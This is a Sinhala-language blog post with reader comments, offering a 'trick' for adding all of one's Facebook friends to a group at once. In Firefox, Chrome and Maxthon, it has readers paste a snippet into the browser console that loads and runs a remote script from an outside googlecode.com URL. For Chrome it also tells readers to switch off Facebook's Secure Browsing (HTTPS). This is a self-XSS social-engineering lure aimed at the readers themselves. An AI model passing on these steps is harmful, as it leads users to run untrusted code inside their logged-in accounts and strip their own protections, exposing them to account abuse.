Pages

තාමත් Facebook Group වලට Membersලා Add කරන්න වද විදිනවාද?

මේ දවස් වල බොහෝ ලෙස Facebook තුළ පැතිර ගිය එකක් තමා එක Code එකකින් Group එකකට එකපාර Members ලා ඇඩ් කර ගන්න විදිහ ගැන. ඒ කියන්නේ ඒ Code එක අවශ්‍ය තැනට Paste කරලා Enter දීලා බලන් ඉන්න විතරයි අපට තියෙන්නේ. එතකොට අපේ ඔක්කොම යාලුවෝ ටික මිනිත්තු ගානකින් ටක් ටක් ගාලා Group වලට ඇඩ් වෙනවා.  Copy , Paste , Enter විතරයි. හරි පහසුයි Groups වලට Members Add කරන්න.

හැබැයි ඉතින් මේ විදිහට මේ ක්‍රමය වැඩ කරන්න ටික කාලයක් විතරයි. පසුව එය වැඩ කරන්නේ නැතුව යයි. ඒක නිසා ඔබ මෙයින් ප්‍රයෝජනය ගන්න නම් දැන්ම වැඩේට බහින්න ඕන.

මේක කරන විදිහ එක් එක් Web Browser එකට වෙනස් වෙනවා.

මෙන්න එහෙනම් එක් එක් බ්‍රව්සර් එකට ගැලපෙන Codes හා ඒ කරන විදිහ පහල තියෙනවා. ඔයාලත් මේක කරන්න පොඩි ට්‍රයි එකක් දීලා බලන්නකෝ. වැඩේ හරි ලේසියි.


---- Mozilla Firefox වලින් වැඩේ කරන හැටි, ----

1 ප්‍රථමයෙන් ම පහත Code එක Copy කර ගන්න.
 document.body.appendChild(document.createElement('script')).src='http://asaas.googlecode.com/files/tghiwa2.js';
2 ඔබට මිතුරන් ඇඩ් කරන් අවශ්‍ය ගෘප් එකට යන්න.

3 පසුව Ctrl + Shift + K යන Keys එකවර ඔබන්න.

4 පසුව Ctrl + V එකවර ඔබන්න.

5 ඉන් පසුව Enter ඔබලා ටික වෙලාවක් බලන් ඉන්න එවිට මිතුරන් ඇඩ් වෙනවා කුඩා සෘජුකෝණාස්‍ර විනිවිද පෙනෙන කොටුවක් මගින් ඔයාලට පෙනෙයි. එය අවසන් වන තෙක් බලන් ඉන්න. මෙම වැඩේ වෙන අතරතුර වෙන වැඩ කරන්න යන්න එපා. එසේ ඔබ වෙන වැඩකට යොමු වුනොත් එය නිසි සේ සිදු වෙන්නේ නෑ. ඔයාට වෙන වැඩක් කරන්න අවශ්‍ය ම නම් ඔයා ඒ සදහා වෙන Tab එකක් බාවිතා කරන්න.


---- Google Chrome වලින් වැඩේ කරන හැටි, ----

පළමුව ඔබේ ෆේස්බුක් ගිණුමේ Secure Browsing OFF කරන්න. ඒ සදහා Facebook Account Settings >> Security Settings >> Secure Browsing වල ඇති හරි ලකුණ ඉවත් කරලා Save කරන්න.

1 පසුව ම පහත දී ඇති Code එක Copy කර ගන්න.
document.body.appendChild(document.createElement('script')).src='http://asaas.googlecode.com/files/tghiwa2.js';
2 ඔබට මිතුරන් ඇඩ් කරන් අවශ්‍ය ගෘප් එකට යන්න.

3 Group ඒක මතුපිට ඔබ කැමති තැනක Right Click කර එහි ඇති Inspect Element යන්න තෝරන්න.

4 ඉන් පසුව එහි Inspect Element තුළ ඇති Console තෝරන්න.

5 පසුව ඔබ Ctrl + V එකවර ඔබන්න.

6 ඉන් පසුව Enter ඔබලා ටික වෙලාවක් බලන් ඉන්න එවිට මිතුරන් ඇඩ් වෙනවා කුඩා සෘජුකෝණාස්‍ර විනිවිද පෙනෙන කොටුවක් මගින් ඔයාලට පෙනෙයි. එය අවසන් වන තෙක් බලන් ඉන්න. මෙම වැඩේ වෙන අතරතුර ඔයාලා වෙන වැඩ කරන්න යන්න එපා. එසේ ඔබ වෙන වැඩකට යොමු වුනොත් එය නිසි සේ සිදු වෙන්නේ නෑ. ඔයාට වෙන වැඩක් කරන්න අවශ්‍ය ම නම් ඔයා ඒ සදහා වෙන Tab එකක් බාවිතා කරන්න.


ඉහත බ්‍රව්සර් 2ට මෙය වැඩ කළේ නැතිනම් කළ යුතු දේ.

ඉහත ආකාරයට Firefox වලටයි Chrome වලටයි මෙම ස්ක්‍රිප්ට් එක වැඩ කරේ නැත්තන් ඔයාලා පහත ලින්ක් එකට ගිහින්  Maxthon කියන බ්‍රව්සර් එක Download කර ගන්න. ඒක Download කරගෙන ඔයාලා සුපුරුදු විදිහට ඔයාගේ පරිගණකයට Install කරගෙන ඔබ සුපුරුදු ආකාරයට එම අලුත් බ්‍රව්සර් එකෙන් තම Facebook acc එකට Log වෙන්න. මෙම බ්‍රව්සර් එකට නම් මෙය වැඩ කරනවා විශ්වාසයි.
මෙන්න එහෙනම් මෙතනින් ඒ බ්‍රව්සර් එක බා ගන්නකෝ..


ඉන්පසුව පහත පියවරවල් අනුගමනය කරන්න.

Maxthon වලින් වැඩේ කරන හැටි

1 ප්‍රථමයෙන් ම පහත දී ඇති Code එක Copy කර ගන්න.
 document.body.appendChild(document.createElement('script')).src='http://asaas.googlecode.com/files/tghiwa2.js';
2 ඔබට මිතුරන් ඇඩ් කරන් අවශ්‍ය ගෘප් එකට යන්න.

3 Group ඒක මතුපිට ඔබ කැමති තැනක Right Click කර එහි ඇති Inspect Element යන්න තෝරන්න.

4 ඉන් පසුව එහි Inspect Element තුළ ඇති Console තෝරන්න.

5 පසුව ඔබ Ctrl + V එකවර ඔබන්න.

6 ඉන් පසුව Enter ඔබලා ටික වෙලාවක් බලන් ඉන්න එවිට මිතුරන් ඇඩ් වෙනවා කුඩා සෘජුකෝණාස්‍ර විනිවිද පෙනෙන කොටුවක් මගින් ඔයාලට පෙනෙයි. එය අවසන් වන තෙක් බලන් ඉන්න. මෙම වැඩේ වෙන අතරතුර වෙන වැඩ කරන්න යන්න එපා. එසේ ඔබ වෙන වැඩකට යොමු වුනොත් එය නිසි සේ සිදු වෙන්නේ නෑ. ඔයාට වෙන වැඩක් කරන්න අවශ්‍ය ම නම් ඔයා ඒ සදහා වෙන Tab එකක් බාවිතා කරන්න.

 සැ/යු - මෙම Code එක Paste කරන ස්ථාන බ්‍රව්සර් එකෙන් එකට වෙනස් උනාට සාපේක්ෂව සමහරක් බ්‍රව්සර් වල මෙම Code එක Paste කරන ආකාරය සමාන වේ. ඒ අනුව ඔබ වෙනත් බ්‍රව්සර් එකක් භාවිතා කරන්නේ නම් මෙම Code එක මගින් එම බ්‍රව්සර් එක මගින්ද හාවිතයට ගත හැකිය.




Like Us..*||Ṫḩiwanka Ṉimesh'ş ẞᶘớǵ||*

8 Comments:

  1. Replies
    1. හ්ම්.. බං ඒක එහෙම වෙන්න බෑ ඕක වැඩ කරනවා බං පොඩ්ඩක් උඔ ඕක ආයේ පාරක් ට්‍රයි කරලා බලහං.

      Delete
  2. අහ් බං මං මේක දැනුත් චෙක් කරා මට නම් වැඩ...

    අහ් මචන් උඔ බලහං උබේ Account එකේ Secure Browsing OFF කරල ද කියලා.. https කියන එක http කියලා තියෙන්න ඕන.

    ReplyDelete
  3. පෝස්ටුව නං හොඳා

    ReplyDelete
    Replies
    1. තැන්කිව් තැන්කිව් හෝම්ස් මචන්.

      Delete
  4. 100% wada karanawa thanks machan......

    ReplyDelete
  5. නියමයි තිවංක මචං

    ReplyDelete